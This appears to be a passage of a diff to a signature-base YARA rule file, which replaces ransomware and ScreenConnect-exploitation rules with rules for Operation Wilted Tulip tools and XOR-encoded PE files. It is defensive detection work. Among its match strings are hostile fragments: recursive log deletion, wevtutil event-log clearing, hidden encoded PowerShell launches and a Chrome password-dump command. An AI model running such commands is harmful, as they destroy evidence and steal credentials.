+		tags = "FILE"
+		hash1 = "552245645cc49087dfbc827d069fa678626b946f4b71cb35fa4a49becd971363"
 
 	strings:
-		$x1 = ">>>> Your personal DECRYPTION ID:"
+		$sc2 = { E6 FF FF 48 89 45 D0 8B 45 E0 BA 00 00 00 00 BE
+               00 00 00 00 89 C7 E8 }
+		$sc3 = { E6 FF FF 89 45 DC 8B 45 DC 83 C0 01 48 98 BE 01
+               00 00 00 48 89 C7 E8 }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x457f and filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_MAL_SUSP_RANSOM_Lazy_Ransomnote_Feb24
+rule SIGNATURE_BASE_APT_LNX_Academic_Camp_May20_Loader_1 : FILE
 {
 	meta:
-		description = "Detects the Lazy ransom note file 'HowToRestoreYourFiles.txt' which is a sign of a Lazy ransomware infection"
-		author = "Florian Roth"
-		id = "287dfd67-8d0d-5906-b593-3af42a5a3aa4"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L151-L163"
+		description = "Detects malware used in attack on academic data centers"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cda65abd-d918-5ee6-8f4a-554d47532d76"
+		date = "2020-05-16"
+		modified = "2023-12-05"
+		reference = "https://csirt.egi.eu/academic-data-centers-abused-for-crypto-currency-mining/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_academic_data_centers_camp_may20.yar#L20-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c9416d05f0bd9aab9d6108380c1b5364f4c4e112b6e0726202f083eaacfdcf56"
+		logic_hash = "a73883f9fdf3d53694d9f9efec5f8f15994c5fd80c5f2a87b1741db6b954a023"
 		score = 75
 		quality = 85
-		tags = ""
-
-	strings:
-		$x1 = "All Encrypted files can be reversed to original form and become usable"
+		tags = "FILE"
+		hash1 = "0efdd382872f0ff0866e5f68f0c66c01fcf4f9836a78ddaa5bbb349f20353897"
+
+	strings:
+		$sc1 = { C6 45 F1 00 C6 45 F2 0A C6 45 F3 0A C6 45 F4 4A
+               C6 45 F5 04 C6 45 F6 06 C6 45 F7 1B C6 45 F8 01 }
+		$sc2 = { 01 48 39 EB 75 EA 48 83 C4 08 5B 5D 41 5C 41 5D }
+
+	condition:
+		uint16( 0 ) == 0x457f and filesize < 10KB and all of them
+}
+rule SIGNATURE_BASE_SUSP_Two_Byte_XOR_PE_And_MZ : FILE
+{
+	meta:
+		description = "Look for 2 byte xor of a PE starting at offset 0"
+		author = "Wesley Shields <wxs@atarininja.org>"
+		id = "ddb87194-bafb-597d-9184-fe4fe3c5ce8d"
+		date = "2021-10-11"
+		modified = "2023-12-05"
+		reference = "https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xored_pe.yar#L2-L13"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "8a43ff9ec966df72ef35fb9ba9bbbd6f8b0f3761669bb91dc5919645d6327174"
+		score = 70
+		quality = 85
+		tags = "FILE"
 
 	condition:
-		1 of them
+		uint16( 0 ) != 0x5a4d and uint32( ( uint16( 0x3c ) ^ ( uint16( 0 ) ^ 0x5a4d ) ) | ( ( uint16( 0x3e ) ^ ( uint16( 0 ) ^ 0x5a4d ) ) << 16 ) ) ^ ( ( uint16( 0 ) ^ 0x5a4d ) | ( ( uint16( 0 ) ^ 0x5a4d ) << 16 ) ) == 0x00004550
 }
-rule SIGNATURE_BASE_SUSP_MAL_Signingcert_Feb24_1 : CVE_2024_1708 CVE_2024_1709 FILE
+rule SIGNATURE_BASE_SUSP_Four_Byte_XOR_PE_And_MZ : FILE
 {
 	meta:
-		description = "Detects PE files signed with a certificate used to sign malware samples mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709"
-		author = "Florian Roth"
-		id = "f25ea77a-1b4e-5c13-9117-eedf0c20335a"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L166-L184"
+		description = "Look for 4 byte xor of a PE starting at offset 0"
+		author = "Wesley Shields <wxs@atarininja.org>"
+		id = "d7b4b462-dfde-5d1f-8039-63522436c15f"
+		date = "2021-10-11"
+		modified = "2023-12-05"
+		reference = "https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xored_pe.yar#L15-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "824efe1fa441322d891805df9a1637ebb44d18889572604acc125bf79a2d1083"
-		score = 75
+		logic_hash = "28230cd3c1d1da97a98df09243593eb59b57f376f651d5f22c3ea5903f0f73e4"
+		score = 70
 		quality = 85
-		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
-		hash1 = "37a39fc1feb4b14354c4d4b279ba77ba51e0d413f88e6ab991aad5dd6a9c231b"
-		hash2 = "e8c48250cf7293c95d9af1fb830bb8a5aaf9cfb192d8697d2da729867935c793"
-
-	strings:
-		$s1 = "Wisdom Promise Security Technology Co." ascii
-		$s2 = "Globalsign TSA for CodeSign1" ascii
-		$s3 = { 5D AC 0B 6C 02 5A 4B 21 89 4B A3 C2 }
+		tags = "FILE"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 70000KB and all of them
+		uint16( 0 ) != 0x5a4d and uint32( 0x28 ) != 0x00000000 and uint32( 0x28 ) == uint32( 0x2c ) and uint32( uint32( 0x3c ) ^ uint32( 0x28 ) ) ^ uint32( 0x28 ) == 0x00004550
 }
-
-rule SIGNATURE_BASE_MAL_CS_Loader_Feb24_1 : CVE_2024_1708 CVE_2024_1709 FILE
+rule SIGNATURE_BASE_SUSP_EXPL_LIBCUE_CVE_2023_43641_Oct23_1 : CVE_2023_43641 FILE
 {
 	meta:
-		description = "Detects Cobalt Strike malware samples mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709"
+		description = "Detects a suspicious .cue file that could be an exploitation attempt of libcue vulnerability CVE-2023-43641"
 		author = "Florian Roth"
-		id = "6c9914a4-b079-5a39-9d3b-7b9a2b54dc2b"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L186-L206"
+		id = "34fcf80c-adcd-55c0-9fb4-261d20f61fa6"
+		date = "2023-10-27"
+		modified = "2023-12-05"
+		reference = "https://github.com/github/securitylab/blob/main/SecurityExploits/libcue/track_set_index_CVE-2023-43641/README.md"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_libcue_cve_2023_43641.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ae0e25c2dda1b727978977c674e834cd659661c597d88395a6f46ad5a179e9f0"
-		score = 75
+		logic_hash = "a2cd3c1b0b3551ffb24bf7704c37c1be6c1a9655c74447d2f7f94540dd0ab188"
+		score = 70
 		quality = 85
-		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
-		hash1 = "0a492d89ea2c05b1724a58dd05b7c4751e1ffdd2eab3a2f6a7ebe65bf3fdd6fe"
+		tags = "CVE-2023-43641, FILE"
 
 	strings:
-		$s1 = "Dll_x86.dll" ascii fullword
+		$a1 = "TRACK "
+		$a2 = "FILE "
+		$s1 = "INDEX 4294"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.exports ( "UpdateSystem" ) and ( pe.imphash ( ) == "0dc05c4c21a86d29f1c3bf9cc5b712e0" or $s1 ) )
+		filesize < 100KB and all of them
 }
-
-rule SIGNATURE_BASE_MAL_RANSOM_Lockbit_Indicators_Feb24 : CVE_2024_1708 CVE_2024_1709 FILE
+rule SIGNATURE_BASE_Wiltedtulip_Tools_Back : FILE
 {
 	meta:
-		description = "Detects Lockbit ransomware samples mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709"
-		author = "Florian Roth"
-		id = "108430c8-4fe5-58a1-b709-539b257c120c"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L208-L228"
+		description = "Detects Chrome password dumper used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3f57bd66-b269-5f59-ade1-f881b1d7dadd"
+		date = "2017-07-23"
+		modified = "2022-12-21"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L13-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e4cd6b1a1bc57bf25c71f6bc228f45e4a996f9d9d391aeb3dda9c7d7857610bc"
+		logic_hash = "3a23491cbb24177c027695d8f677c4a72ed0404c4c38356eec4b92f2d06be2ee"
 		score = 75
 		quality = 85
-		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
-		hash1 = "a50d9954c0a50e5804065a8165b18571048160200249766bfa2f75d03c8cb6d0"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b7faeaa6163e05ad33b310a8fdc696ccf1660c425fa2a962c3909eada5f2c265"
 
 	strings:
-		$op1 = { 76 c1 95 8b 18 00 93 56 bf 2b 88 71 4c 34 af b1 a5 e9 77 46 c3 13 }
-		$op2 = { e0 02 10 f7 ac 75 0e 18 1b c2 c1 98 ac 46 }
-		$op3 = { 8b c6 ab 53 ff 15 e4 57 42 00 ff 45 fc eb 92 ff 75 f8 ff 15 f4 57 42 00 }
+		$x1 = "%s.exe -f \"C:\\Users\\Admin\\Google\\Chrome\\TestProfile\" -o \"c:\\passlist.txt\"" fullword ascii
+		$x2 = "\\ChromePasswordDump\\Release\\FireMaster.pdb" ascii
+		$x3 = "//Dump Chrome Passwords to a Output file \"c:\\passlist.txt\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "914685b69f2ac2ff61b6b0f1883a054d" or 2 of them ) or all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
 }
-rule SIGNATURE_BASE_MAL_MSI_Mpyutils_Feb24_1 : CVE_2024_1708 CVE_2024_1709 FILE
+rule SIGNATURE_BASE_Wiltedtulip_Tools_Clrlg : FILE
 {
 	meta:
-		description = "Detects malicious MSI package mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709"
-		author = "Florian Roth"
-		id = "e7794336-a325-5b92-8c25-81ed9cb28044"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L230-L247"
+		description = "Detects Windows eventlog cleaner used in Operation Wilted Tulip - file clrlg.bat"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6957c97d-2c2d-50ac-8fd5-2f299fc7b5c8"
+		date = "2017-07-23"
+		modified = "2023-12-05"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L31-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ba20db486e5d3c29c9702e10628fb3c0e55e52bbec74e3a86ed6511a6475b82f"
-		score = 70
+		logic_hash = "003f711ac6f2308f2bdc638da7c654686e7402db7b3837120168e5a99b774537"
+		score = 75
 		quality = 85
-		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
-		hash1 = "8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b33fd3420bffa92cadbe90497b3036b5816f2157100bf1d9a3b6c946108148bf"
 
 	strings:
-		$s1 = "crypt64ult.exe" ascii fullword
-		$s2 = "EXPAND.EXE" wide fullword
-		$s6 = "ICACLS.EXE" wide fullword
+		$s1 = "('wevtutil.exe el') DO (call :do_clear" fullword ascii
+		$s2 = "wevtutil.exe cl %1" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 20000KB and all of them
+		filesize < 1KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_Beacon_Unknown_Feb24_1 : CVE_2024_1708 CVE_2024_1709 FILE
+rule SIGNATURE_BASE_Wiltedtulip_Powershell
 {
 	meta:
-		description = "Detects malware samples mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709 "
-		author = "Florian Roth"
-		id = "9299fd44-5327-5a73-8299-108b710cb16e"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L249-L268"
+		description = "Detects powershell script used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b6246508-a6ff-5a02-a0de-9cde139f0acc"
+		date = "2017-07-23"
+		modified = "2023-12-05"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L47-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fd6ebc6676d677d6bc19398026eee7b7d2f9727ba7a3c79d1e970a6dc19548aa"
+		logic_hash = "57d28f7b79cc14b8bbc2d7c9b2c16ab0f94a4b160cf7cb1d4641fe1c77e06811"
 		score = 75
 		quality = 85
-		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
-		hash1 = "6e8f83c88a66116e1a7eb10549542890d1910aee0000e3e70f6307aae21f9090"
-		hash2 = "b0adf3d58fa354dbaac6a2047b6e30bc07a5460f71db5f5975ba7b96de986243"
-		hash3 = "c0f7970bed203a5f8b2eca8929b4e80ba5c3276206da38c4e0a4445f648f3cec"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e5ee1f45cbfdb54b02180e158c3c1f080d89bce6a7d1fe99dd0ff09d47a36787"
 
 	strings:
-		$s1 = "Driver.dll" wide fullword
-		$s2 = "X l.dlT" ascii fullword
-		$s3 = "$928c7481-dd27-8e23-f829-4819aefc728c" ascii fullword
+		$x1 = "powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 3 of ( $s* )
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_INC_Aug24 : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Vminst : FILE
 {
 	meta:
-		description = "Detects INC ransomware and it's variants like Lynx"
-		author = "X__Junior"
-		id = "b776490b-f26a-55d9-bb26-ec3c617f070c"
-		date = "2024-08-08"
-		modified = "2024-12-12"
-		reference = "https://twitter.com/rivitna2/status/1701739812733014313"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_inc_ransomware.yar#L1-L30"
+		description = "Detects malware used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5d21e515-eb7b-56ab-acc2-f09065769b2d"
+		date = "2017-07-23"
+		modified = "2023-12-05"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L62-L88"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "335b92027c551d074015b830d137cf2fdee81d792cd7360f2499c83cc895fbbb"
-		score = 80
+		logic_hash = "a4559c2f4de60537827d167453751a92c0030ae6ce095a2d64df777e93d4b87a"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "eaa0e773eb593b0046452f420b6db8a47178c09e6db0fa68f6a2d42c3f48e3bc"
-		hash2 = "1754c9973bac8260412e5ec34bf5156f5bb157aa797f95ff4fc905439b74357a"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "930118fdf1e6fbffff579e65e1810c8d91d4067cbbce798c5401cf05d7b4c911"
 
 	strings:
-		$s1 = "tarting full encryption in" wide
-		$s2 = "oad hidden drives" wide
-		$s3 = "ending note to printers" ascii
-		$s4 = "uccessfully delete shadow copies from %c:/" wide
-		$op1 = { 33 C9 03 C6 83 C0 02 0F 92 C1 F7 D9 0B C8 51 E8 }
-		$op2 = { 8B 44 24 [1-4] 6A 00 50 FF 35 ?? ?? ?? ?? 50 FF 15}
-		$op3 = { 57 50 8D 45 ?? C7 45 ?? 00 00 00 00 50 6A 00 6A 00 6A 02 6A 00 6A 02 C7 45 ?? 00 00 00 00 FF D6 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 04 8B F8 8D 45 ?? 50 8D 45 ?? 50 FF 75 ?? 57 6A 02 6A 00 6A 02 FF D6 }
-		$op4 = { 6A FF 8D 4? ?? 5? 8D 4? ?? 5? 8D 4? ?? 5? 5? FF 15 ?? ?? ?? ?? 85 C0 }
-		$op5 = { 56 6A 00 68 01 00 10 00 FF 15 ?? ?? ?? ?? 8B F0 83 FE FF 74 ?? 6A 00 56 FF 15 ?? ?? ?? ?? 68 88 13 00 00 56 FF 15 ?? ?? ?? ?? 56 FF 15}
+		$x1 = "\\C++\\Trojan\\Target\\" ascii
+		$s1 = "%s\\system32\\rundll32.exe" fullword wide
+		$s2 = "$C:\\Windows\\temp\\l.tmp" fullword wide
+		$s3 = "%s\\svchost.exe" fullword wide
+		$s4 = "args[10] is %S and command is %S" fullword ascii
+		$s5 = "LOGON USER FAILD " fullword ascii
+		$s6 = "vminst.tmp" fullword wide
+		$s7 = "operator co_await" fullword ascii
+		$s8 = "?ReflectiveLoader@@YGKPAX@Z" fullword ascii
+		$s9 = "%s -k %s" fullword wide
+		$s10 = "ERROR in %S/%d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 3 of ( $s* ) or 3 of ( $op* ) or ( 2 of ( $s* ) and 2 of ( $op* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 5 of ( $s* ) )
 }
-rule SIGNATURE_BASE_M_APT_Downloader_BEATDROP : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Windows_UM_Task
 {
 	meta:
-		description = "Rule looking for BEATDROP malware"
-		author = "Mandiant"
-		id = "5720870e-8989-59f2-998b-019084d091ce"
-		date = "2022-04-28"
+		description = "Detects a Windows scheduled task as used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d827584e-8298-56e4-8466-90950d1f286e"
+		date = "2017-07-23"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_apr22.yar#L1-L17"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L90-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7a766682cc9a057798cc569111bfcb611648c4a052c0dd664d983b80d5891255"
-		score = 90
+		logic_hash = "cfc2d231b6be798172e5d7ffc525842c7eed6d78a145c401136452c46f21e3b2"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4c2fc21a4aab7686877ddd35d74a917f6156e48117920d45a3d2f21fb74fedd3"
 
 	strings:
-		$ntdll1 = "ntdll" ascii fullword
-		$ntdll2 = "C:\\Windows\\System32\\ntdll.dll" ascii fullword nocase
-		$url1 = "api.trello.com" ascii
-		$url2 = "/members/me/boards?key=" ascii
-		$url3 = "/cards?key=" ascii
+		$r1 = "<Command>C:\\Windows\\syswow64\\rundll32.exe</Command>" fullword wide
+		$p1 = "<Arguments>\"C:\\Users\\public\\" wide
+		$c1 = "svchost64.swp\",checkUpdate" wide ascii
+		$c2 = "svchost64.swp,checkUpdate" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 1MB and all of them
+		($r1 and $p1 ) or 1 of ( $c* )
 }
-rule SIGNATURE_BASE_M_APT_Downloader_BOOMMIC : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Windowstask
 {
 	meta:
-		description = "Rule looking for BOOMMIC malware"
-		author = "Mandiant"
-		id = "34ea08a6-5d6f-5cdd-a629-fa36313c98f7"
-		date = "2022-04-28"
+		description = "Detects hack tool used in Operation Wilted Tulip - Windows Tasks"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ad8193f0-e664-50a8-ab05-38027a2e33cd"
+		date = "2017-07-23"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_apr22.yar#L19-L38"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L109-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c561b19464597f896d31307c0383fbc639cf4211600513e1251a3f59405bfed6"
+		logic_hash = "a2bbcb02f34b2da3d88772d211cc7bfb669384161eec94336cdc2474144b16ae"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c3cbe88b82cd0ea46868fb4f2e8ed226f3419fc6d4d6b5f7561e70f4cd33822c"
+		hash2 = "340cbbffbb7685133fc318fa20e4620ddf15e56c0e65d4cf1b2d606790d4425d"
+		hash3 = "b6f515b3f713b70b808fc6578232901ffdeadeb419c9c4219fbfba417bba9f01"
+		hash4 = "5046e7c28f5f2781ed7a63b0871f4a2b3065b70d62de7254491339e8fe2fa14a"
+		hash5 = "984c7e1f76c21daf214b3f7e131ceb60c14abf1b0f4066eae563e9c184372a34"
 
 	strings:
-		$loc_10001000 = { 55 8B EC 8D 45 0C 50 8B 4D 08 51 6A 02 FF 15 [4] 85 C0 74 09 B8 01 00 00 00 EB 04 EB 02 33 C0 5D C3 }
-		$loc_100012fd = {6A 00 8D 55 EC 52 8B 45 D4 50 6A 05 8B 4D E4 51 FF 15 }
-		$func1 = "GetComputerNameExA" ascii
-		$func2 = "HttpQueryInfoA" ascii
+		$x1 = "<Command>C:\\Windows\\svchost.exe</Command>" fullword wide
+		$x2 = "<Arguments>-nop -w hidden -encodedcommand" wide
+		$x3 = "-encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 1MB and ( ( $loc_10001000 and $func1 ) or ( $loc_100012fd and $func2 ) )
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_SH_Esxi_Attacks_Feb23_1 : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Tdtess : FILE
 {
 	meta:
-		description = "Detects script used in ransomware attacks exploiting and encrypting ESXi servers - file encrypt.sh"
-		author = "Florian Roth"
-		id = "7178dbe4-f573-5279-a23e-9bab8ae8b743"
-		date = "2023-02-04"
+		description = "Detects malicious service used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0ecb391b-a4f9-5362-bb65-73801ae497de"
+		date = "2017-07-23"
 		modified = "2023-12-05"
-		reference = "https://www.bleepingcomputer.com/forums/t/782193/esxi-ransomware-help-and-support-topic-esxiargs-args-extension/page-14"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ransom_esxi_attacks_feb23.yar#L6-L28"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L130-L147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1143ee36603f604874432ee280314a9f62ffe64e58ec5cd4eb114b7b175b365a"
-		score = 85
-		quality = 60
+		logic_hash = "ffd10e06b3a8f3054747443b863070e8726589fc795f816832dbf73c0c34e080"
+		score = 75
+		quality = 85
 		tags = "FILE"
-		hash1 = "10c3b6b03a9bf105d264a8e7f30dcab0a6c59a414529b0af0a6bd9f1d2984459"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3fd28b9d1f26bd0cee16a167184c9f4a22fd829454fd89349f2962548f70dc34"
 
 	strings:
-		$x1 = "/bin/find / -name *.log -exec /bin/rm -rf {} \\;" ascii fullword
-		$x2 = "/bin/touch -r /etc/vmware/rhttpproxy/config.xml /bin/hostd-probe.sh" ascii fullword
-		$x3 = "grep encrypt | /bin/grep -v grep | /bin/wc -l)" ascii fullword
-		$s1 = "## ENCRYPT" ascii fullword
-		$s2 = "/bin/find / -name *.log -exec /bin" ascii fullword
+		$x1 = "d2lubG9naW4k" fullword wide
+		$x2 = "C:\\Users\\admin\\Documents\\visual studio 2015\\Projects\\Export\\TDTESS_ShortOne\\WinService Template\\" ascii
+		$s1 = "\\WinService Template\\obj\\x64\\x64\\winlogin" ascii
+		$s2 = "winlogin.exe" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x2123 and filesize < 10KB and ( 1 of ( $x* ) or 2 of them ) or 3 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 2 of them ) )
 }
-rule SIGNATURE_BASE_MAL_RANSOM_ELF_Esxi_Attacks_Feb23_1 : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Silverlightmsi : FILE
 {
 	meta:
-		description = "Detects ransomware exploiting and encrypting ESXi servers"
-		author = "Florian Roth"
-		id = "d0a813aa-41f8-57df-b708-18ccb0d7a3e5"
-		date = "2023-02-04"
+		description = "Detects powershell tool call Get_AD_Users_Logon_History used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6430d464-b9c7-5f19-b89d-3c70f99af688"
+		date = "2017-07-23"
 		modified = "2023-12-05"
-		reference = "https://www.bleepingcomputer.com/forums/t/782193/esxi-ransomware-help-and-support-topic-esxiargs-args-extension/page-14"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ransom_esxi_attacks_feb23.yar#L30-L56"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L149-L165"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "27ff018574323c10821993c30cf74de15121caa92a308fbcae4eceae954e63b6"
-		score = 85
